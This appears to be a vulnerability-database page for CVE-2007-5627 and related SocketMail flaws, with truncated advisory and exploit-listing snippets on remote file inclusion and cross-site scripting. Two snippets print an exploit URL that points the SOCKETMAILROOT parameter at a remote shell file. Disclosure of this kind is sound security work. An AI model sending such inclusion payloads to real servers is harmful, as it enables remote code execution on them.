CVE-2007-5627

PHP remote file inclusion vulnerability in content/fnc-readmail3.php in SocketMail 2.2.8 allows remote attackers to execute arbitrary PHP code via a URL in the SOCKETMAILROOT parameter...

CVE-2007-5627

The set of connected documents confirms CVE-2007-5627 affects SocketMail 2.2.8. The vulnerability is a PHP remote file inclusion in content/fnc-readmail3.php, exploitable via a URL in the __SOCKETMAIL_ROOT parameter, allowing an attacker to execute arbitrary PHP code. This is the stated impact in...

SocketMail FNC-Readmail3.PHP远程文件包含漏洞

SocketMail是一款基于PHP的WEB应用程序。 SocketMail不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是由于'FNC-Readmail3.PHP'脚本对用户提交的'SOCKETMAILROOT'参数缺少过滤，指定远程服务器上的任意文件作为包含对象，可导致以以WEB权限执行任意命令。 Creative Digital Resources SocketMail 2.2.8 目前没有解决方案提供： http://www.socketmail.com/site/home/...

SocketMail 2.2.8 fnc-readmail3.php Remote File Inclusion Vulnerability

No description provided by source. Vulnerability Type: Remote File Inclusion Vulnerable file: /mail/content/fnc-readmail3.php Exploit URL: http://localhost/mail/content/fnc-readmail3.php?SOCKETMAILROOT=http://localhost/shell.txt? Method: get Registerglobals: On Vulnerable variable: SOCKETMAILROOT...

socketmail-xss.txt

+====================================================================+ + SocketMail =2.2.1 XSS Multiple Remote Vulnerabilities + +====================================================================+ Authors: Ivan Sanchez & Maximiliano Soler. Product: SocketMail. Description: SocketMail is a...

socketmail-rfi.txt

Vulnerability Type: Remote File Inclusion Vulnerable file: /mail/content/fnc-readmail3.php Exploit URL: http://localhost/mail/content/fnc-readmail3.php?SOCKETMAILROOT=http://localhost/shell.txt? Method: get Registerglobals: On Vulnerable variable: SOCKETMAILROOT Line number: 399 Lines:...

Socketmail 2.2.1 - 'lostpwd.php' Cross-Site Scripting

source: https://www.securityfocus.com/bid/26138/info SocketMail is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user ...

Socketmail 2.2.1 - lostpwd.php Cross-Site Scripting

Socketmail 2.2.1 - lostpwd.php Cross-Site Scripting source: https://www.securityfocus.com/bid/26138/info SocketMail is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary...

CVE-2006-2681

PHP remote file inclusion vulnerability in SocketMail Lite and Pro 2.2.6 and earlier, when registerglobals and magicquotes are enabled, allows remote attackers to execute arbitrary PHP code via a URL in the sitepath parameter to 1 index.php and 2 inc-common.php...

Remote file inclusion

PHP remote file inclusion vulnerability in SocketMail Lite and Pro 2.2.6 and earlier, when registerglobals and magicquotes are enabled, allows remote attackers to execute arbitrary PHP code via a URL in the sitepath parameter to 1 index.php and 2 inc-common.php...

CVE-2006-2681

PHP remote file inclusion vulnerability in SocketMail Lite and Pro 2.2.6 and earlier, when registerglobals and magicquotes are enabled, allows remote attackers to execute arbitrary PHP code via a URL in the sitepath parameter to 1 index.php and 2 inc-common.php...

CVE-2006-2681

CVE-2006-2681 describes a PHP remote file inclusion in SocketMail Lite and Pro 2.2.6 and earlier. When both register_globals and magic_quotes are enabled, an attacker can supply a URL in the site_path parameter to (1) index.php or (2) inc-common.php to execute arbitrary PHP code on the server. Th...

[MajorSecurity #6]Socketmail <= 2.2.6 - Remote File Include Vulnerability

MajorSecuritySocketmail = 2.2.6 - Remote File Include Vulnerability -------------------------------------------------------- Software: Socketmail Version: =2.2.6 Type: Remote File Include Vulnerability Date: May, 25th 2006 Vendor: Creative Digital Resources Page: http://socketmail.com Risc: High...

Socketmail 2.2.6 - site_path Remote File Inclusion

Socketmail 2.2.6 - sitepath Remote File Inclusion Title: Socketmail = 2.2.6 - Remote File Include Vulnerability ----------------------------------------------------------------- Vendor: Creative Digital Resources URL: http://socketmail.com...

Socketmail <= 2.2.6 (site_path) Remote File Include Vulnerability

No description provided by source. Title: Socketmail = 2.2.6 - Remote File Include Vulnerability ----------------------------------------------------------------- Vendor: Creative Digital Resources URL: http://socketmail.com ----------------------------------------------------------------- Credit...

Socketmail <= 2.2.6 (site_path) Remote File Include Vulnerability

Exploit for unknown platform in category web applications ================================================================= Socketmail = 2.2.6 sitepath Remote File Include Vulnerability ================================================================= Title: Socketmail = 2.2.6 - Remote File Inclu...

Socketmail 2.2.6 - &#039;site_path&#039; Remote File Inclusion

Title: Socketmail = 2.2.6 - Remote File Include Vulnerability ----------------------------------------------------------------- Vendor: Creative Digital Resources URL: http://socketmail.com ----------------------------------------------------------------- Credits: Discovered by: 'Aesthetico'...